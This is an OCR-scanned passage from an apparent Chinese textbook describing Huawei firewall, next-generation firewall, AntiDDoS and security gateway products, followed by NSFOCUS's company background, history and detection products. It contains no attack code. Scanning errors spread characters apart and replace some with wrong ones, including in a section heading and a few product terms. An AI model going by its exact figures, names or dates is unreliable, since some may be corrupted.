1.44Tbps, 最 大 并 发 连接 数 为 14.4 亿 , 虚 拟 防 火 墙 数量 可 高 达 4096 个 ,足以 满足 广电 、 
政府 .能 源 .教育 等 高 端 用 户 的 高 性 能 需求 。 

4) 稳定 可 靠 的 安全 网 关 产 品 全 宛 余 ,保障 用 户 业 务 永 续 

网 络 的 安全 一 直 都 是 企业 运行 的 关键 所 在 。 为 保证 高 速 网 络 环境 下 的 业务 持续 ， 
USG9500 在 支持 主 一 备 . 主 一 主 组 网 .端口 聚合 .VPN 宛 余 、 业 务 板 负载 均衡 等 关键 技术 
的 同时 ,还 提供 业界 独 有 的 双 主 控 主 备 倒 换 技 术 , 将 防火 墙 的 可 靠 性 提高 到 高 端 路 由 器 
级 别 , 保 证 关键 节点 可 靠 性 一 致 。USG9500 整 机 平均 无 故障 时 间 长 达 20 万 小 时 ,故障 倒 
换 时 间 小 于 1 秒 ,真正 保障 业务 持续 稳定 运行 。 
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5) 丰富 的 虚拟 化 一 一 应 对 云 网 络 部 署 

随 着 云 计算 时 代 的 到 来 ,以 “虚拟 化 技术 ”和 “高 速 网 络 ” 为 基石 的 云 计算 面临 安全 的 
挑战 。USG9500 具有 高 吞吐 量 性 能 的 同时 提供 了 丰富 的 虚拟 系统 功能 ,支持 资源 虚拟 
化 .配置 虚拟 化 .转发 虚拟 化 等 多 维度 虚拟 化 功能 ,为 云 网 络 用 户 提供 个 性 化 的 网 络 安全 
需求 。 资 源 虚 拟 化 提供 定制 化 的 虚拟 资源 ,不 同 虚 拟 系统 可 按 需 分 配 不 同 资源 ;管理 虚 
拟 化 提供 各 虚拟 防火 墙 独立 配置 个 性 化 策略 ,日 志 管 理 和 审计 功能 ,提供 按照 租户 要 求 
的 管理 策略 ;转发 虚拟 化 提供 定制 化 的 业务 处 理 流程 ,各 虚拟 系统 之 间 转 发 平面 隔离 ,一 
个 虚拟 系统 资源 耗 尽 不 影响 其 他 虚拟 系统 正常 运行 , 且 逻 辑 隔离 ,确保 各 虚拟 系统 内 部 
租户 的 数据 安全 。 


2. 下 一 代 防 火 墙 


华为 下 一 代 防 火 墙 分 为 三 个 系列 。 

第 一 个 系列 是 USG6300 下 一 代 防 火 墙 ,其 面向 中 小 企业 和 连锁 机 构 ,提供 精细 的 应 
用 层 安 全 防护 和 业务 加 速 。 一 机 多 能 ,提供 全 面 、 简 单 .高效 的 下 一 代 网 络 安全 防护 。 

第 二 个 系列 是 USG6500 下 一 代 防 火 墙 ,其 面向 中 小 企业 ,企业 分 支 和 连锁 机 构 , 提 
供 精细 的 应 用 层 安全 防护 和 业务 加 速 。 一 机 多 能 ,实现 多 地 间 的 稳定 安全 互联 ,提供 全 
面 、 简 单 、 高 效 的 下 一 代 网 络 安全 防护 。 

第 三 个 系列 是 USG6600 下 一 代 防 火 墙 ,其 面向 大 中 型 企业 、 机 构 及 下 一 代数 据 中 
心 ,支持 6000 十 应 用 识别 ;智能 精简 防火 墙 策 略 , 让 管理 更 简单 ;功能 全 面 ,多 重 防护 下 仍 
保持 优异 性 能 。 

华为 下 一 代 防 火 墙 面向 不 同 大 小 的 企业 ,通过 对 应 用 、 用 户 、 内 容 、 威 胁 、 时 间 、 位 置 6 
个 维度 的 全 面 感知 ,提供 精细 的 业务 访问 控制 和 加 速 。 入 侵 防 御 (IPS) 和 防 病毒 (AV) 等 
应 用 层 深 度 防 御 与 应 用 识别 相 结合 ,有 效 提高 了 威胁 防御 的 效率 和 准确 性 。 有 具备 全 面 的 
防护 功能 ,一 机 多 能 ,有 效 降低 管理 成 本 。 精 细 的 带宽 管理 和 QoS 优化 能 力 有 效 降 低 企 
业 的 带宽 租用 费 ,确保 关键 业务 体验 。 持 续 、 简 单 ,高效 地 提供 下 一 代 网 络 安全 。 组 网 应 
用 如 图 4.8 所 示 。 


企业 网 络 


分支 机 构 


图 4.8 组 网 应 用 
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其 产品 特性 包括 : 

1) 精准 的 访问 控制 

采用 一 体 化 防护 ,从 应 用 ,用户 、 内 容 . 时 间 、 威 胁 、 位 置 6 个 维度 进行 一 体 化 的 管控 
和 防御 。 内 容 层 的 防御 与 应 用 识别 深度 结合 ,一体 化 处 理 。 例 如 ,识别 出 Oracle 的 流量 ， 
进而 有 针对 性 地 进行 对 应 的 入侵 防御 ,效率 更 高 , 误 报 更 少 。 

(1) 基于 应 用 ,运用 多 种 技术 手段 ,准确 识别 包括 移动 应 用 及 Web 应 用 内 的 6000 十 
应 用 协议 及 应 用 的 不 同 功 能 ,继而 进行 访问 控制 和 业务 加 速 。 例 如 ,区 分 微 信 的 语音 和 
文字 后 采取 不 同 的 控制 策略 。 

(2) 基于 用 户 ,通过 Radius、LDAP、AD 等 8 种 用 户 识 别 手段 集成 已 有 用 户 认证 系统 
简化 管理 。 基 于 用 户 进 行 访问 控制 .QoS 管理 和 深度 防护 。 

(3) 基于 位 置 ,与 全 球 位 置信 息 结合 ,识别 流量 发 起 的 位 置信 息 ; 掌 控 应 用 和 攻击 发 
起 的 位 置 ,第 一 时 间 发 现 网 络 异 常情 况 。 根 据 位 置信 息 可 以 实现 对 不 同 区 域 访问 流量 的 
差异 化 控制 ,支持 根据 IP 自 定义 位 置 。 

2) 全 面 的 防护 范围 

(1) 一 机 多 能 , 集 传统 防火 墙 \VPN、 入 侵 防御 、 防 病毒 .数据 防 泄露 带宽 管理 、 上 网 
行为 管理 等 功能 于 一 身 ,简化 部 署 , 提 高 管理 效率 。 

(2) 入 侵 防护 (IPS) ,超过 3500 十 漏洞 特征 的 攻击 检测 和 防御 。 支 持 Web 攻击 识别 
和 防护 ,如 跨 站 脚本 攻击 、SQL 注入 攻击 等 。 

(3) 防 病毒 (AV) ,高 性 能 病毒 引擎 ,可 防护 500 万 种 以 上 的 病毒 和 木马 ,病毒 特征 库 
每 日 更 新 。 

(4) 数据 防 泄露 , 对 传输 的 文件 和 内 容 进 行 识别 过 滤 。 可 识别 120 十 种 常见 文件 类 
型 ,防止 通过 修改 后 级 名 的 病毒 攻击 。 能 对 Word、Excel、PPT、PDF、RAR 等 30 十 文件 
进行 还 原 和 内 容 过 滤 ,防止 企业 关键 信息 通过 文件 泄露 。 

(5) SSL 解密 ,作为 代理 ,可 对 SSL 加 密 流 量 进行 应 用 层 安 全 防护 ,如 IPS、AV 数据 
防 泄露 .URL 过 滤 等 。 

(6) Anti-DDoS, 可 以 识别 和 防范 SYN flood、UDP flood 等 10 十 种 DDoS 攻击 ,识别 
500 多 万 种 病毒 。 

(7) 上 网 行为 管理 ,采用 基于 云 的 URL 分 类 过 滤 , 预 定义 的 URL 分 类 库 已 超过 
8500 万 ,阻止 员工 访问 恶意 网 站 带 来 的 威胁 。 并 可 对 员工 的 发 帖 .FTP 等 上 网 行为 进行 
控制 。 可 对 上 网 记录 进行 审计 。 

(8) 安全 互联 ,丰富 的 VPN 特性 ,确保 企业 总 部 和 分 支 间 高 可 靠 安 全 互联 。 支 持 
IPSec VPN.SSL VPN.L2TP VPN、MPLS VPN GRE 等 。 

(9) QoS 管理 ,基于 应 用 灵活 的 管理 流量 带宽 的 上 限 和 下 限 ,可 基于 应 用 进行 策略 路 
由 和 QoS 标签 着 色 ,支持 对 URL 分 类 的 QoS 标签 着 色 。 例 如 ,优先 转发 对 财经 类 网 站 
的 访问 。 

(10) 负载 均衡 ,支持 服务 器 间 的 负载 均衡 。 对 多 出 口 场景 ,可 按照 链 路 质量 \ 链 路 带 
宽 比例 \ 链 路 权重 基于 应 用 进行 负载 均衡 。 

(11) 虚拟 化 ,支持 多 种 安全 业务 的 虚拟 化 ,包括 防火 墙 . 入 侵 防 御 、 反 病毒 、VPN 等 。 
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不 同 用 户 可 在 同一 台 物 理 设备 上 进行 隔离 的 个 性 化 管理 。 

3) 简单 的 安全 管理 

华为 下 一 代 防 火 墙 利用 Smart Policy 功能 降低 对 使 用 者 的 要 求 , 更 好 地 进行 防护 。 
Smart Policy 主要 具备 以 下 功能 。 

(1) 快速 部 署 策略 ,内 置 场景 策略 模板 ,不 依赖 使 用 者 的 经 验 也 能 快速 地 部 署 常用 防 
护 策略 。 例 如 ,如 果 和 希望 使 用 网 络 存储 ,管理 员 仅 需 基 于 “使 用 网 盘 ” 这 个 策略 模板 ,就 能 
建立 一 系列 策略 。 在 策略 中 ,对 网 盘 类 应 用 允许 下 载 并 进行 病毒 检测 ,但 禁止 文件 上 传 。 

(2) 智能 优化 策略 ,根据 内 置 应 用 风险 库 和 网 络 实际 流量 对 已 部 署 的 安全 策略 进行 
评估 和 优化 ,使 其 符合 最 小 授权 原则 。 在 企业 遗留 大 量 端口 防护 策略 ,需要 转换 为 
NGFW 使 用 的 应 用 防护 策略 时 尤其 有 用 。 

(3) 智能 精简 策略 ,自动 发 现 重复 的 和 长 期 没有 使 用 的 策略 ,精简 策略 规模 ,简化 
管理 。 

4) 高 效 防护 性 能 

华为 下 一 代 防 火 墙 采用 全 新 架构 的 智能 感知 引擎 (Intelligence Awareness Engine， 
IAE) ,采用 了 一 次 解析 多 业务 并 行 处 理 的 架构 ,确保 多 重 防御 下 的 高 性 能 体验 。IAE 使 
用 了 三 大 核心 技术 。 

(1) 一 体 化 描述 语言 ,应 用 识别 .IPS、AV 采用 统一 的 描述 语言 ,一 次 性 处 理 , 一 次 性 
分 析 , 减 少 重复 的 操作 。 

(2) 一 体 化 处 理 架构 ,不 同 于 UTM 对 各 个 安全 功能 串 行 处 理 ,USG6000 在 完成 统 
一 解析 后 ,各 安全 业务 检查 是 并 行 的 ,最 后 做 统一 处 理 。 每 个 步骤 一 次 性 做 好 ,确保 多 安 
全 业务 开启 情况 下 ,对 整体 性 能 影响 最 小 。 

(3) 软 硬 结合 一 体 化 ,对 有 规律 ,大 批量 .高 运算 能 力 要 求 的 报 文 处 理 , 如 报 文 加 解 
密 .特征 匹配 ,采用 专用 多 核 平台 由 专用 的 协 处 理 器 硬件 处 理 。 对 小 规模 的 运算 ,仍然 用 
软件 处 理 。 软 硬结 合 一 体 化 的 处 理 方式 让 整体 性 能 更 高 。 


3. DDoS 攻击 防御 


华为 DDoS 攻击 防御 产品 包含 两 个 系列 。 

第 一 个 系列 是 AntiDDoS8000 DDoS 防御 系统 ,主要 面向 运营 商 , 大 型 企业 、 数 据 中 
心 和 大 型 ICP 服务 商 的 基础 设施 与 在 线 业务 系统 ,提供 专业 级 DDoS 防御 方案 ,可 实现 
工 级 防护 性 能 、 秒 级 攻击 响应 速度 和 超 百 种 攻击 的 全 面 防御 ,保护 业务 永 续 。 

第 二 个 系列 是 AntiDDoS1000 DDoS 防御 系统 ,主要 面向 金融 ,政府 .ICP 服务 商 、 数 
据 中 心 的 关键 在 线 业 务 系统 ,提供 专业 级 DDoS 防御 方案 ,可 实现 超 百 种 攻击 的 精准 全 
面 防御 和 秒 级 攻击 响应 ,保护 业务 永 续 。 其 防护 过 程 如 图 4. 9 所 示 。 

其 产品 的 主要 产品 功能 如 下 。 

1) 基于 业务 的 防护 策略 

本 方案 能 够 针对 防护 对 象 的 业务 流量 进行 持续 的 周期 性 的 学 习 和 分 析 , 勾 勒 出 业务 
流量 正常 曲线 ,针对 不 同 的 业务 流量 类 型 .同一 业务 不 同时 段 , 采 取 不 同 的 防御 防护 类 型 
和 防护 策略 ,实现 精细 化 防护 。 
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[interim 具有 特征 的 人 应 用 协议 》 | 异常 连接 》 | 慢 速 攻击 y | 突 发 流量 y | 正常 流量 


畸形 报 文 过 滤 || 特征 过 滤 | | 虚假 源 认证 应 用 层 认证 || 会 话 分 析 || 行为 分 析 || 智能 限 速 
图 4.9 防护 过 程 


2) 精准 的 异常 流量 清洗 

华为 AntiDDoS 产品 采用 大 数据 分 析 技 术 , 从 60 多 种 维度 对 流量 进行 模型 学 习 , 一 
且 某 个 维度 出 现 流 量 异 常 立 即 启动 防护 。 防 护 采用 七 层 过 滤 ,行为 分 析 、 会 话 监控 等 多 
种 技术 手段 ,能 精确 防护 各 种 Flood 类 攻击 流量 、Web 应 用 类 攻击 流量 .DNS 攻击 流量 、 
SSL DoS/DDoS 类 攻击 流量 和 协议 栈 漏 洞 类 攻击 流量 ,保护 应 用 服务 器 安全 。 

3) DNS 流量 智能 Cache 

华为 AntiDDoS 产品 不 但 能 够 精确 防护 针对 DNS 服务 器 的 各 种 漏洞 攻击 .应 用 攻击 
和 Flood 类 攻击 ,还 可 提供 DNS Cache 功能 ,缓解 DNS 服务 器 大 流量 下 的 性 能 压力 。 

4) 流行 僵 木 蠕 防护 

黑客 通过 木马 蠕虫 感染 网 络 中 的 大 量 主机 ,分 层 控制 组 成 僵尸 网 络 , 以 便 其 发 动 各 
种 攻击 行为 ,因此 可 谓 僵 尸 网 络 是 黑客 发 起 DDoS 攻击 的 温床 。 华 为 AntiDDoS 产品 系 
列 能 够 支持 全 球 最 流行 200 十 种 伪 己 工具、 木马、 蠕虫 流量 的 识别 与 阻 断 ,从 而 达到 摧毁 
僵尸 网 络 的 目的 。 

5) 完善 的 IPv4-v6 双 栈 防护 

2011 年 2 月 ,IANA 宣告 IPv4 地 址 分 配 告 玫 ,企业 面临 无 新 的 v4 地 址 使 用 局 面 , 纷 
纷 将 IPv6 网 络 建设 纳入 网 络 规划 建设 议程 。 华 为 Anti-DDoS 解决 方案 独 有 的 IPv4-v6 
双 栈 合 一 技术 ,能够 同时 防御 IPv6 与 IPv4 组 网 内 的 DDoS 攻击 ,满足 双 栈 DDoS 防御 需 
求 , 帮 助 用 户 无 优 过 渡 到 下 一 代 网 络 。 

6) 灵活 的 组 网 部 署 方 式 

AntiDDoS 产品 系列 作为 对 已 有 网 络 的 保护 措施 ,必须 能 够 适应 客户 多 种 不 同 的 网 
络 环境 ,并 满足 客户 不 同 的 业务 等 级 要 求 。 正 是 基于 此 ,华为 AntiDDoS 产品 系列 为 客户 
提供 了 直路 和 旁 路 等 多 种 网 络 部 署 方式 ,客户 可 以 根据 业务 需要 和 网 络 结构 灵活 选择 ， 
具体 包括 如 下 方式 。 

(1) 直路 接 人 模式 ,将 清洗 检测 模块 串 接 在 客户 需要 保护 的 网 络 中 ,直接 对 客户 流量 
进行 检测 和 清洗 。 华 为 基于 高 性 能 多 核 硬件 平台 ,在 高 效 的 保证 检测 和 清洗 准确 性 的 同 
时 ,也 将 处 理 时 延 做 到 最 小 。 此 外 ,华为 AntiDDoS 产品 支持 Bypass 板 卡 模块 , 当 出 现 意 
外 时 ,流量 自动 透 传 清洗 模块 ,避免 为 客户 引入 新 的 故障 点 。 
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(2) 旁 路 引流 模式 ,将 清洗 模块 部 署 在 客户 网 络 旁 路 上 ,对 客户 流量 进行 旁 路 检测 ， 
一 旦 发 现 DDoS 攻击 流量 ,清洗 检测 中 心 可 以 根据 客户 在 管理 中 心 上 制 定 的 检测 清洗 策 
略 执行 相应 的 动作 。 


4. 应 用 安全 网 关 


华为 应 用 安全 网 关系 列 十 分 丰富 ,主要 包括 如 下 几 个 系列 。 

1) USG2110 统一 安全 网 关 

定位 连锁 机 构 .营业 网 点 `、 SOHO 企业 , 集 防 火 墙 \、UTM、 路 由 、 无 线 功能 于 一 体 , 能 
够 将 多 种 业务 部 署 在 同一 节点 ,充分 节约 用 户 投资 ,有 效 降低 运 维 成 本 。 

2) USG5100BSR 多 业务 安全 网 关 

面向 中 小 型 企业 提供 完整 的 接 人 解决 方案 , 集 安 全 路由、 交换 .无 线 等 特性 于 一 体 ， 
接口 丰富 ,性 能 领先 ,为 用 户 提供 随 需 而 变 的 业务 灵活 性 和 投资 保护 。 

3) USG2000BSR 多 业务 安全 网 关 

集 接 入 交换、 安全 于 一 体 ,支持 3G 和 无 线 接 入 ,帮助 企业 实现 全 无 线 组 网 ,同时 为 
用 户 提供 强大 、 可 扩展 ,持续 的 安全 能 力 ,是 SOHO 企业 、 小 型 办 公 室 互联 网 接 和 的 最 佳 
之 选 。 

4) NIP6000 下 一 代入 侵 防 御 系统 

面向 企业 用 户 和 数据 中 心 推 出 的 下 一 代入 侵 防 御 系统 ,提供 更 精准 的 检测 .防御 能 
力 和 更 优化 的 管理 体验 ,实现 对 网 络 基 础 设施 .服务 器 .客户 端 以 及 网 络 带 宽 性 能 的 全 面 
防护 。 

5) NIP2000/5000 入 侵 防 御 系统 

面向 IPv4 和 IPv6 网 络 环境 下 ,提供 虚拟 补丁 .Web 应 用 防护 .客户 端 保护 .恶意 软 
件 防御 、 网 络 及 应 用 层 DoS 防御 等 功能 。 

6) NIP2000D/5000D 入 侵 检测 系统 

帮助 用 户 定 位 各 种 网 络 威胁 ,以 及 违反 安全 策略 的 行为 ,并 提供 翔实 、 有 效 的 指导 措 
施 , 进 而 实现 检测 一 响应 一 体 化 的 解决 方案 。 

7) SVN5600/5800 安全 接 人 网 关 

最 高 支持 5 万 并 发 用 户 在 线 , 可 满足 不 同 规模 企业 的 远程 接 入 、 移 动 办 公 、 桌 面 云 接 
入 需求 ,帮助 企业 在 保证 信息 安全 的 前 提 下 提升 办 公 及 运 维 效 率 , 并 保证 接 入 用 户 的 一 
致 体验 。 

8) ASG2000 上 网 行为 管理 产品 

帮助 企业 解决 不 合 规 上 网 行为 带 来 的 工作 效率 低下 .带宽 滥用 、 病 毒 感染 .内 部 信息 
泄露 以 及 法 律 合 规 等 问题 。 具 有 精准 应 用 识别 .高 可 靠 性 .全面 威胁 过 滤 和 专业 报表 等 
特点 。 

9) WAF2000/5000 Web 应 用 防火 墙 

面向 企业 用 户 推 出 的 一 款 专 业 Web 应 用 安全 防护 产品 ,满足 各 类 法 律 法 规 ( 如 PCI、 
等 级 保护 ) .企业 内 部 控制 规范 的 要 求 ,为 企业 Web 应 用 提供 全 方位 的 防护 。 
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10) USG6000V 虚拟 综合 业务 网 关 

面向 数据 中 心 推出 的 一 款 基于 NFV 架构 云 化 多 业务 综合 业务 网 关 产 品 , 支 持 业界 
最 多 的 6000 十 应 用 识别 , 集 路 由 ,传统 防火 墙 \VPN、 入 侵 防御 、 防 病毒 .负载 均衡 等 多 种 
网 关 功 能 于 一 体 ,帮助 虚拟 网 络 构 建安 全 的 逻辑 边界 。 


43 北京 神州 绿 盟 信和 谍 案 全 科技 股份 有 限 公 司 


北京 神州 绿 盟 信息 安全 科技 股份 有 限 公 司 ( 简 称 绿 盟 科技 ) ,总 部 位 于 北京 。 在 国内 
外 设 有 30 多 个 分 支 机 构 ,为 政府 .运营 商 、 金 融 、 能 源 . 互 联网 以 及 教育 .医疗 等 行业 用 
户 ,提供 安 全 产品 及 解决 方案 。 从 成 立 之 初 , 绿 盟 科技 不 断 明确 持 续 创 新 的 价值 观 。 和 凭 
借 技 术 团队 的 深厚 技术 底蕴 及 勇于 创新 的 精神 , 绿 盟 科技 在 其 10 年 的 发 展 历程 中 , 铸 刻 
了 国内 信息 安全 行业 的 多 项 第 一 : 第 一 家 推出 网 络 入 侵 防 御 类 产品 ;第 一 家 推出 高 性 能 
远程 漏洞 扫描 类 产品 ;第 一 家 推出 专业 的 DDoS 攻击 防护 类 产品 ;第 一 家 推出 Web 应 用 
专用 防护 网 关 类 产品 ;网 络 入 侵 检测 /防护 产品 的 第 一 市 场 占有 率 等 。 


431 基本 情况 


绿 盟 自 2000 年 4 月 成 立 以 来 ,在 检测 防御 类 、 安 全 评估 类 ,安全 监管 类 等 领域 ,为 客 
户 提供 入 侵 检 测 / 防 护 、 抗 拒绝 服务 攻击 、 远 程 安全 评估 以 及 Web 安全 防护 等 产品 以 及 
专业 安全 服务 ,客户 覆盖 国民 经 济 的 多 个 行业 ,尤其 在 政府 .运营 商 、 金 融 、 能 源 .教育 、 医 
疗 等 重点 行业 。 凭 借 具 有 同行 业 领先 水 平 的 安全 专家 持续 不 懈 的 努力 , 绿 盟 在 十 多 年 的 
发 展 历程 中 收获 了 众多 创新 成 果 ,产品 主要 包括 下 一 代 防 火 墙 CNF) .网络 人 侵 防 护 系统 
(NIPS) .抗拒 绝 服务 攻击 系统 (ADS) .远程 安全 评估 系统 (RSAS)、Web 应 用 防火 墙 
(WAF) 威胁 分 析 系 统 (TAC) 等 。 北 京 神 州 绿 盟 信息 安全 科技 股份 有 限 公司 于 2014 年 
1 月 29 日 起 在 深圳 证 券 交 易 所 创业 板 上 市 交易 ,股票 简称 : 绿 盟 科技 ,股票 代码 : 
300369。 自 2007 年 起 , 绿 盟 开始 积极 拓展 海外 市 场 。 现 已 在 日 本 东京 .美国 硅谷 .中 国 
香港 设立 子 公司 ,并 在 欧洲 、 东 南亚 设立 分 支 机 构 , 深 入 开展 全 球 业务 。 客 户 复 盖 美 国 、 
日 本 英国 .荷兰 .新加坡 马来西亚、 韩国. 阿 联 疯 等 多 个 国家 与 地 区 。 正 在 为 保障 全 球 
客户 的 网 络 与 业务 的 平稳 运行 而 持续 努力 。 同 时 公司 与 国际 领先 的 安全 专业 机 构 、 合 作 
伙伴 建立 联系 ,满足 更 大 范围 国际 市 场 的 安全 需求 。 由 于 公司 加 大 对 国内 、 国 际 市 场 拓 
展 ,取得 了 成 效 ,实现 了 销售 收入 的 持续 增长 ,2014 年 营业 收入 同比 增长 12. 78%。 


432 发 展 历程 


2000 年 4 月 25 日 , 绿 盟 科技 于 北京 成 立 。 同 年 11 月 13 日 , 绿 盟 科技 “ 冰 之 眼 ” 网 络 
入 侵 侦 测 系统 通过 公安 部 鉴定 。 同 年 12 月 26 日 ,国内 第 一 批 CIW 认证 网 络 安全 专家 在 
绿 盟 科技 产生 。 

2001 年 8 月 30 日 , 绿 盟 科 技 远程 安全 评估 系统 通过 公安 部 鉴定 。 同 年 9 月 29 日 ， 
绿 盟 科技 入 选 国家 网 络 安全 服务 试点 单位 。 
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2002 年 5 月 15 日 , 绿 盟 科技 通过 信息 产业 部 软件 企业 认定 。 同 年 6 月 20 日 , 绿 盟 
科技 网 络 人 侵 检 测 系统 一 一 冰 之 眼 ? 通 过 中 国 国 家 信息 安全 产品 认证 。 同 年 6 月 28 
日 , 绿 盟 科技 黑洞 获得 计算 机 信息 系统 安全 专用 产品 销售 许可 证 。 同 年 8 月 2 日 , 绿 盟 
科技 RSAS 远程 安全 评估 系统 (V2. 02) 获 得 国家 信息 安全 认证 产品 型 号 证 书 。 同 年 12 
月 12 日 , 绿 盟 科技 获得 国家 首 批 信息 安全 服务 资质 。 

2003 年 7 月 13 日 , 绿 盟 科技 荣获 “中 国 网 络 安 全 值得 信赖 服务 品牌 "。 同 年 8 月 14 
日 , 绿 盟 科技 荣获 “中 国信 息 安全 优秀 解决 方案 ” 奖 。 同 年 11 月 20 日 , 绿 盟 科 技 荣获 “中 
国电 子 政 务 信息 安全 优秀 供应 商 ” 奖 。 

2004 年 6 月 25 日 , 绿 盟 科 技 推 出 千 兆 线 速 入侵 检测 系统 。 同 年 7 月 15 日 , 绿 盟 科 
技 获得 国际 和 国内 质量 体系 双 认 证 。 同 年 11 月 5 日 , 绿 盟 科技 获得 由 国家 信息 安全 测 
评 认证 中 心 颁发 的 信息 安全 服务 资质 证 书 。 同 年 12 月 30 日 , 绿 盟 科技 获得 由 中 国信 息 
安全 分 级 认证 推进 大 会 颁发 的 EAL3 级 证 书 。 

2005 年 9 月 5 日 , 绿 盟 科技 入 选 “国家 网 络 与 信息 安全 信息 通报 技术 支持 单位 ”。 同 
年 12 月 6 日 , 绿 盟 科技 远程 安全 评估 系统 及 人 侵 检测 /防护 系统 通过 CVE 兼容 性 认证 。 
同年 12 月 19 日 , 绿 盟 科技 网 络 人 侵 检测 系统 双向 线 速 处 理 能 力 达到 64B 2Gbps 指标 。 

2006 年 2 月 11 日 , 绿 盟 科技 包揽 2005 年 入 侵 检 测 / 保 护 系 统 奖项 。 同 年 3 月 21 
日 , 绿 盟 科技 首 家 荣获 “ 涉 密 信息 系统 NIPS 产品 检测 证 书 ”。 同 年 7 月 11 日, 绿 盟 科技 
“极光 ”V4 发 布 。 

2007 年 1 月 10 日 , 绿 盟 科技 获 中 国 互联 网 大 会 最 佳 安全 服务 奖 。 同 年 4 月 4 日 , 绿 
盟 科技 成 为 国内 首 家 通过 ISO 27001 认证 的 安全 公司 。 同 年 7 月 9 日 , 绿 盟 科技 成 为 全 
国信 息 安 全 标准 委员 会 工作 组 成 员 。 同 年 11 月 16 日 , 绿 盟 科 技 自主 研发 的 高 性 能 流量 
清洗 系统 正式 上 市 。 同 年 12 月 18 日 , 绿 盟 科技 率先 推出 国内 首 款 千 兆 线 速 IPS 产品 。 

2008 年 1 月 9 日 , 绿 盟 科技 率先 在 国内 发 布 Web 应 用 防火 墙 。 同 年 2 月 20 日 , 绿 
盟 科技 两 款 “ 黑 洞 " 高 端 流量 分 析 新 品 成 功 上 市 。 同 年 3 月 10 日 , 绿 盟 科技 远程 安全 评 
估 系 统 获得 国际 权威 认证 (WCL 认证 )。 同 年 6 月 6 日, 绿 盟 科技 极光 远程 安全 评估 系 
统 * 漏 洞 管理 系列 ”正式 上 市 。 同 年 7 月 8 日 , 绿 盟 科技 首 批 获 国 家 一 级 应 急 处 理 服务 资 
质 。 同 年 7 月 25 日 , 绿 盟 科技 下 一 代 安全 网 关 产 品 正 式 上 市 。 同 年 8 月 8 日 , 绿 盟 科技 
极光 远程 安全 评估 系统 “风险 核查 系列 ?正式 上 市 。 同 年 8 月 25 日 , 绿 盟 科技 安全 审计 
系统 和 内 容 安全 管理 系统 新 版 本 正式 上 市 。 同 年 11 月 17 日 , 绿 盟 科技 极光 安全 配置 核 
查 系 统 正 式 上 市 。 同 年 12 月 17 日 , 绿 盟 科技 推出 业界 首 款 通过 第 三 方 权威 评测 的 万 兆 
线 速 IPS 产品 。 

2009 年 3 月 20 日 , 绿 盟 科技 与 微软 建立 MAPP 合作 伙伴 关系 。 同 年 9 月 16 日 , 绿 
盟 科 技 NIPS 首 家 获得 入 侵 防 护 类 产品 EAL3 级 证 书 。 同 年 11 月 1 日 , 绿 盟 远程 安全 评 
估 系 统 与 绿 盟 Web 应 用 防护 系统 双双 获得 EAL3 级 证 书 。 

2010 年 3 月 31 日 , 绿 盟 科技 IPS 产品 荣获 NSS Labs Recommend 认证 。 同 年 6 月 
12 日 , 绿 盟 科技 获 首 批 信息 安全 风险 评估 服务 资质 证 书 。 同 年 7 月 9 日 , 绿 盟 科技 新 一 
代 万 兆 多 核 抗 DDoS 产品 发 布 上 市 。 同 年 8 月 20 日 , 绿 盟 科技 与 StopBadware 达成 战略 
合作 信誉 服务 国际 共享 。 同 年 10 月 26 日 , 绿 盟 科技 域名 安全 产品 DSS 发 布 上 市 。 同 年 
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12 月 20 日 , 绿 盟 科技 网 站 域名 解析 监测 服务 上 市 。 同 年 12 月 22 日 , 绿 盟 安全 审计 系 
统一 堡垒 机 正式 上 市 。 

2011 年 4 月 15 日 , 绿 盟 科技 安全 基线 管理 系列 产品 上 市 。 同 年 4 月 25 日 , 绿 盟 科 
技 网 站 安全 监测 系统 上 市 。 同 年 5 月 30 日 , 绿 盟 科技 反 钓 鱼网 站 监控 服务 上 市 。 同 年 8 
月 18 日 , 绿 盟 科技 WAF 获 值得 CSO 信赖 的 高 端 产品 奖 。 

2012 年 7 月 6 日 , 绿 盟 科技 发 布 国 内 首 款 下 一 代入 侵 防 护 系统 。 同 年 7 月 19 日 , 绿 
盟 科 技 入 侵 防护 系统 人 围 Gartner 魔力 象限 。 同 年 11 月 1 日 , 绿 盟 科技 获 批 成 立 “ 网 络 
攻防 关键 技术 北京 市 工程 实验 室 ”。 同 年 12 月 21 日 , 绿 盟 科技 Web 应 用 漏洞 扫描 系统 
上 市 ; 

2013 年 4 月 25 日 , 绿 盟 科技 下 一 代 防 火 墙 上 市 。 同 年 12 月 9 日 , 绿 盟 科技 获 “ 国 家 
漏洞 库 一 级 技术 支撑 单位 ”。 

2014 年 1 月 29 日 , 绿 盟 科技 在 深交 所 创业 板 上 市 。 同 年 3 月 21 日 , 绿 盟 科技 可 管 
理 安 全 服务 (MSS) 荣 获 国际 奖项 。 同 年 5 月 21 日, 绿 盟 科技 通过 ISO 27001 认证 ,树立 
云 安全 服务 行业 标杆 。 同 年 8 月 1 日 , 绿 盟 科技 发 布 新 一 代 威 胁 防御 整 体 解决 方案 。 同 
年 9 月 15 日 , 绿 盟 科技 发 布 工控 漏洞 扫描 系统 ICSScan。 同 年 10 月 20 日 , 绿 盟 科技 数 
据 库 审计 系统 上 市 。 

2015 年 4 月 8 日 , 绿 盟 数据 泄露 防护 系统 CNSFOCUS DLP) 上 市 。 同 年 5 月 20 日 ， 
绿 盟 科技 投资 金山 安全 。 


433 主要 产品 


绿 盟 科技 网 络 安全 产品 主要 分 为 三 大 类 ,分 别 是 检测 防御 类 、 安 全 评估 类 、 安 全 监管 
类 ,大 约 有 19 个 产品 系列 。 


1. 检测 防御 类 


1) 绿 盟 抗拒 绝 服务 系统 

针对 目前 流行 的 DDoS 攻击 ,包括 未 知 的 攻击 形式 . 绿 盟 科技 提供 了 自主 研发 的 抗 
拒绝 服务 产品 (NSFOCUS Anti-DDoS System,NSFOCUS ADS) 。 通 过 及 时 发 现 背 景 流 
量 中 各 种 类 型 的 攻击 流量 ,NSFOCUS ADS 可 以 迅速 对 攻击 流量 进行 过 滤 或 旁 路 ,保证 
正常 流量 的 通过 。 产 品 可 以 在 多 种 网 络 环境 下 轻松 部 署 ,不 仅 能 够 避免 单 点 故障 的 发 
生 , 同 时 也 能 保证 网 络 的 整体 性 能 和 可 靠 性 。 

绿 盟 科技 推出 了 三 位 一 体 的 异常 流量 清洗 解决 方案 ,可 满足 电信 运营 商 对 大 型 
Anti-DDoS 系统 “可 管理 ,可 运营 ”的 需求 。 该 解决 方案 由 异常 流量 检测 系统 (NSFOCUS 
NTA) .异常 流量 净化 系统 (NSFOCUS ADS) 及 管理 和 取证 系统 (NSFOCUS ADS-M) 
组 成 。 

2) 绿 盟 抗 拒绝 服务 系统 管理 中 心 

